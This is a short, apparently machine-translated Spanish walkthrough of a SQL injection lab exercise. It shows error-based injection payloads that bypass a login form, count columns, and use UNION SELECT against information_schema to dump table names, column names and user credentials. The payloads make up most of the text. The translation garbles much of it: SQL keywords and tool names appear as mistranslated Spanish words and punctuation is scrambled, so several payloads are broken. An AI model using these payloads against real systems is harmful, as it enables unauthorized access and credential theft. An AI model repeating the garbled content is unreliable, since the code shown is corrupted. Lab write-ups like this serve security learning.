Menos-12 después de -Error Based - Las comillas dobles - secuencia - con giro
Menos-11 con la diferencia de que un menor-12 es una comilla comillas dobles corchetes, por menos de 12-Suite directamente a los ejercicios de eructar, paso consistente con menos-11.
0x01. Página original
Los nombres de usuario y contraseñas dos parámetros fueron uname y passwd. Eructo presentó parámetros uname = xxx xxx y passwd =
0x02. Tipo de inyección Analizar
uname = 1 & passwd = 1 & submit = Enviar
uname = 1' y passwd = 1 & submit = Enviar
uname = 1" y passwd = 1 & submit = Enviar
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1") LIMIT 0,1' at line 1
La declaración se da puede observar que el carácter de comillas dobles en la inyección de paréntesis
. Analizando el punto de inyección 0x03
intentos de contraseña universales:
. = Los uname 1 ") o los ficheros de contraseñas 1 = = 1. 1 & # = & someter la Enviar..
0x04 determina el número de campos.
uname = admin ") para un 3 y # passwd = 1 & submit = Enviar
uname = admin") para un 2 y # passwd = 1 & submit = Presentar
Consulta devuelve el número de campos es 2, pero no el número de campos en la tabla 2.
. 0x05 nombre de la base Get usuario y
las = uname 1. ") Unión seleccione un usuario (), Base de Datos () -. + Y los = passwd 1 & Enviar = la Enviar
0x06 Get toda la base de datos de seguridad de nombres de tabla.
Uname = 1") union select 1 , GROUP_CONCAT (nombre_tabla ) desde donde INFORMATION_SCHEMA.TABLES esquema_tabla = 'seguridad ' # & passwd = 1 & submit = Enviar
0x07. Obtenga toda la tabla de usuarios nombres de campo
de los = uname. 1 ") Unión SELECT. 1, GROUP_CONCAT (nombre_columna) a partir de INFORMATION_SCHEMA.COLUMNS DONDE TABLE_SCHEMA = 'Seguridad' y nombre_tabla = 'usuarios' # & the = passwd. 1 y submit = la sometemos
0x08. Obtiene todos los valores de los campos
uname = 1 ") union select 1 , GROUP_CONCAT (nombre de usuario, 0x3a, password) de los usuarios y # passwd = 1 & submit = Enviar